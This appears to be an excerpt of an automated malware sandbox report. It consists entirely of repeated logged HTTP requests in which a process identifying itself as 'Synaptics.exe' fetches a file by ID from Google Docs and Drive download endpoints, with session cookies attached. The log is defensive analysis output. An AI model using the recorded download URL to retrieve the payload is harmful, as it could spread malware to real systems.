                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
